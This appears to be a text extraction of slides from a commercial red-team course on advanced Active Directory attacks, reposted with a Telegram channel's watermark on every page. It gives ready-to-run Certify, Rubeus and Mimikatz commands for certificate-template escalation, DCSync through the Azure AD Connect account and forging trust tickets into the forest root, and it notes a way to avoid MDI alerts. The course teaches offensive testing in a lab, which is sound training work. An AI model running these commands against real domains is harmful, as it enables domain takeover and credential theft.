All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 243


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Reference: https://msdn.microsoft.com/en-
us/library/windows/desktop/aa374928(v=vs.85).aspx

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 244


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://github.com/samratashok/RACE
https://github.com/samratashok/nishang/tree/master/Backdoors
https://blogs.msdn.microsoft.com/wmi/2009/07/20/scripting-wmi-namespace-
security-part-1-of-3/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 245


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 246


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://github.com/HarmJ0y/DAMP
https://posts.specterops.io/remote-hash-extraction-on-demand-via-host-security-
descriptor-modification-2cf505ec5c40

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 247


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Trust Attacks


• We now have access Domain Admin privileges in the us.techcorp.local domain.
• Let's discuss attacks across Domain Trusts and Forest trusts.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 248

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 248


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – AD CS


• Active Directory Certificate Services (AD CS) enables use of Public Key
Infrastructure (PKI) in active directory forest.
• AD CS helps in authenticating users and machines, encrypting and
signing documents, filesystem, emails and more.
• "AD CS is the Server Role that allows you to build a public key
infrastructure (PKI) and provide public key cryptography, digital
certificates, and digital signature capabilities for your organization."

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 249

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-
server-2012-r2-and-2012/hh831740(v=ws.11)

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 249


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – AD CS - Terminology


• CA - The certification authority that issues certificates. The server with AD CS
role (DC or separate) is the CA.
• Certificate - Issued to a user or machine and can be used for authentication,
encryption, signing etc.
• CSR - Certificate Signing Request made by a client to the CA to request a
certificate.
• Certificate Template - Defines settings for a certificate. Contains information
like - enrolment permissions, EKUs, expiry etc.
• EKU OIDs - Extended Key Usages Object Identifiers. These dictate the use of a
certificate template (Client authentication, Smart Card Logon, SubCA etc.)

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 250

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 250


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – AD CS - Example

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 251

Diagram source - https://www.specterops.io/assets/resources/Certified_Pre-


Owned.pdf

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 251


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – AD CS - Abuse


• There are various ways of abusing ADCS! (See the link to "Certified Pre-
Owned" paper in slide notes):
– Extract user and machine certificates
– Use certificates to retrieve NTLM hash
– User and machine level persistence
– Escalation to Domain Admin and Enterprise Admin
– Domain persistence
• We will not discuss all of the techniques!

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 252

See page 4 and 5 for summary of attack techniques -


https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 252


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – AD CS - Abuse

Stealing THEFT1 THEFT2 THEFT3 THEFT4 THEFT5


Certificates
Export certs with Extracting user Extracting Steal certificates Use Kerberos
private keys using certs with private machine certs from files and PKINIT to get
Windows' crypto keys using DPAPI with private keys stores NTLM hash
APIs using DPAPI
Persistence PERSIST1 PERSIST2 PERSIST3

User persistence Machine User/Machine


by requesting persistence by persistence by
new certs requesting new renewing certs
certs

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 253

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 253


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – AD CS - Abuse


Escalation ESC1 ESC2 ESC3 ESC4 ESC5 ESC6 ESC7 ESC8

Enrolee can Any Request an Overly Poor access EDITF_ATTRI Poor access NTLM relay
request cert purpose or enrollment permissive control on BUTESUBJE control on to HTTP
for ANY no EKU agent ACLs on CA server, CTALTNAME roles on CA enrollment
user (potentially certificate templates CA server 2 setting on authority like endpoints
dangerous) and use it to computer CA - "CA
request cert object etc. Request Administrato
on behalf of certs for r" and
ANY user ANY user "Certificate
Manager"
Domain DPERSIST1 DPERSIST2 DPERSIST3
Persistence
Forge Malicious Backdoor
certificates root/interm CA Server,
with stolen ediate CAs CA server
CA private computer
keys object etc.
INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 254

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 254


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – AD CS - Enumeration


• We can use the Certify tool (https://github.com/GhostPack/Certify) to
enumerate (and for other attacks) AD CS in the target forest:
Certify.exe cas

• Enumerate the templates.:


Certify.exe find

• Enumerate vulnerable templates:


Certify.exe find /vulnerable

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 255

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 255


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Priv Esc - Across domain trusts – AD CS


• Common requirements/misconfigurations for all the Escalations
– CA grants normal/low-privileged users enrollment rights
– Manager approval is disabled
– Authorization signatures are not required
– The target template grants normal/low-privileged users enrollment
rights

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 256

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 256


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – AD CS - Escalation


• In techcorp, the user pawadmin has enrollment rights to a template -
ForAdminsofPrivilegedAccessWorkstations
• The template has ENROLLEE_SUPPLIES_SUBJECT value for msPKI-
Certificates-Name-Flag. (ESC1)
• This means pawadmin can request certificate for ANY user.
• Note that this does not show up when we enumerate vulnerable
templates in Certify. Use:
Certify.exe find
Certify.exe find /enrolleeSuppliesSubject

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 257

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 257


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – AD CS - Escalation


• We have the certificate of pawadmin that we extracted from us-jump.
(THEFT4)
• Use the certificate to request a TGT for pawadmin and inject it:
C:\AD\Tools\Rubeus.exe asktgt /user:pawadmin
/certificate:C:\AD\Tools\pawadmin.pfx
/password:SecretPass@123 /nowrap /ptt

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 258

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 258


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – AD CS - Escalation to DA


• Request a certificate for DA!
C:\AD\Tools\Certify.exe request /ca:Techcorp-
DC.techcorp.local\TECHCORP-DC-CA
/template:ForAdminsofPrivilegedAccessWorkstations
/altname:Administrator

• Convert from cert.pem to pfx:


C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -
keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export
-out C:\AD\Tools\DA.pfx

• Request DA TGT and inject it:


C:\AD\Tools\Rubeus.exe asktgt /user:Administrator
/certificate:C:\AD\Tools\DA.pfx /password:SecretPass@123 /nowrap
/ptt

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 259

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 259


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – AD CS - Escalation to EA


• Request a certificate for EA!
C:\AD\Tools\Certify.exe request /ca:Techcorp-
DC.techcorp.local\TECHCORP-DC-CA
/template:ForAdminsofPrivilegedAccessWorkstations
/altname:Administrator

• Convert from cert.pem to pfx:


C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -
keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export
-out C:\AD\Tools\EA.pfx

• Request EA TGT and inject it:


C:\AD\Tools\Rubeus.exe asktgt /user:techcorp.local\Administrator
/dc:techcorp-dc.techcorp.local /certificate:C:\AD\Tools\EA.pfx
/password:SecretPass@123 /nowrap /ptt

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 260

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 260


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 261


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 262

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 262


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 263


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 264

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 264


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-
for-takeover-8ee1a53566ab

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 265


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 266


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 267


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 268


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 269


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 270


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks - Attacking Azure AD


Integration
• Azure AD is a popular method to extend identity management from on-
premises AD to Microsoft's Azure offerings.
• Many enterprises use their on-prem AD identities to access Azure
applications.
• "A single user identity for authentication and authorization to all
resources, regardless of location…is hybrid identity."

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 271

https://docs.microsoft.com/en-us/azure/active-directory/hybrid/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 271


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks - Attacking Azure AD


Integration
• An on-premises AD can be integrated with Azure AD using Azure AD
Connect with the following methods:
– Password Hash Sync (PHS)
– Pass-Through Authentication (PTA)
– Federation
• Azure AD Connect is installed on-premises and has a high privilege
account both in on AD and Azure AD!

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 272

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 272


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks - Attacking Azure AD


Integration
• Let's target PHS.
• It shares users and their
password hashes from on-
premises AD to Azure AD.
• A new users MSOL_ is
created which has
Synchronization rights
(DCSync) on the domain!

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 273

https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 273


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks - Attacking Azure AD


Integration - PHS
• Enumerate the PHS account and server where AD Connect is installed.
• Using PowerView:
Get-DomainUser -Identity "MSOL_*" -Domain techcorp.local

• Using the ActiveDirectory module:


Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -
Server techcorp.local -Properties * | select
SamAccountName,Description | fl

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 274

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 274


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks - Attacking Azure AD


Integration - PHS
• We already have administrative access to us-adconnect as
helpdeskadmin.
• With administrative privileges, if we run adconnect.ps1, we can extract
the credentials of the MSOL_ account used by AD Connect in clear-text
.\adconnect.ps1
Note that the above script's code runs powershell.exe so verbose logs (like transcripts) will be there.
• With the password, we can run commands as MSOL_
runas /user:techcorp.local\MSOL_16fb75d0227d /netonly
cmd

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 275

https://blog.xpnsec.com/azuread-connect-for-redteam/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 275


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks - Attacking Azure AD


Integration - PHS
• And can then execute the DCSync attack:
Invoke-Mimikatz -Command '"lsadump::dcsync
/user:us\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync
/user:techcorp\krbtgt /domain:techcorp.local"'
• Please note that because AD Connect synchronizes hashes every two
minutes, in an Enterprise Environment, the MSOL_ account will be excluded
from tools like MDI! This will allow us to run DCSync without any alerts!

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 276

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 276


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 277


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 278

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 278


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – Forest Root


• sIDHistory is a user attribute designed for scenarios where a user is
moved from one domain to another. When a user's domain is changed,
they get a new SID and the old SID is added to sIDHistory.
• sIDHistory can be abused in two ways of escalating privileges within a
forest:
– krbtgt hash of the child
– Trust tickets
• All the Privilege Escalation to techcorp.local we have seen till now needs
some misconfiguration. These ones are 'working as intended'.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 279

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 279


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Child to Forest Root Trust Flow

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 280

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 280


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Child to Forest Root Trust Flow Abuse

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 281

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 281


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – Child to Forest Root -


Trust Key
• So, what is required to forge trust tickets is, obviously, the trust key.
Look for [In] trust key from child to parent.
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -
ComputerName us-dc
or
Invoke-Mimikatz -Command '"lsadump::dcsync
/user:us\techcorp$"'
or
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
• We can also use any of the earlier discussed tools to extract trust keys.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 282

https://adsecurity.org/?p=1588

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 282


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – Child to Forest Root -


Trust Key
• Let's forge an inter-realm TGT:
Invoke-Mimikatz -Command '"kerberos::golden
/domain:us.techcorp.local /sid:S-1-5-21-210670787-
2521448726-163245708 /sids:S-1-5-21-2781415573-
3701854478-2406986946-519
/rc4:b59ef5860ce0aa12429f4f61c8e51979
/user:Administrator /service:krbtgt
/target:techcorp.local
/ticket:C:\AD\Tools\trust_tkt.kirbi"'

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 283

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 283


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – Child to Forest Root - Trust Key


Invoke-Mimikatz -Command

Kerberos::golden The mimikatz module


/domain:us.techcorp.local FQDN of the current domain
/sid:S-1-5-21-210670787-2521448726- SID of the current domain
163245708
/sids:S-1-5-21-2781415573-3701854478- SID of the enterprise admins group of the
2406986946 -519 parent domain
/rc4: b59ef5860ce0aa12429f4f61c8e51979 RC4 of the trust key
/user:Administrator User to impersonate
/service:krbtgt Target service in the parent domain
/target:techcorp.local FQDN of the parent domain
/ticket:C:\AD\Tools\kekeo\trust_tkt. Path where ticket is to be saved
kirbi

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 284

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 284


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – Child to Forest Root -


Trust Key
• Get a TGS for a service (CIFS below) in the target domain by using the
forged trust ticket with Kekeo (https://github.com/gentilkiwi/kekeo/):
tgs::ask /tgt:C:\AD\Tools\trust_tkt.kirbi
/service:CIFS/techcorp-dc.techcorp.local
Or using older version of Kekeo
.\asktgs.exe C:\AD\Tools\trust_tkt.kirbi CIFS/techcorp-
dc.techcorp.local

• Tickets for other services (like HOST and RPCSS for WMI, HTTP for
PowerShell Remoting and WinRM) can be created as well.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 285

List of Active Directory SPNs https://adsecurity.org/?page_id=183

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 285


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – Child to Forest Root -


Trust Key
• Use the TGS to access the targeted service (may need to use it twice).
misc::convert lsa
[email protected]_krbtgt~TECHCORP.LOCA
[email protected]
Or
.\kirbikator.exe lsa .\CIFS.techcorp-
dc.techcorp.local.kirbi

ls \\techcorp-dc.techcorp.local\c$

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 286

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 286


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Domain Attacks – Child to Forest Root -


Trust Key
• Using Rubeus.
.\Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_tkt.kirbi
/service:cifs/techcorp-dc.techcorp.local /dc:techcorp-
dc.techcorp.local /ptt

ls \\techcorp-dc.techcorp.local\c$

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 287

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 287


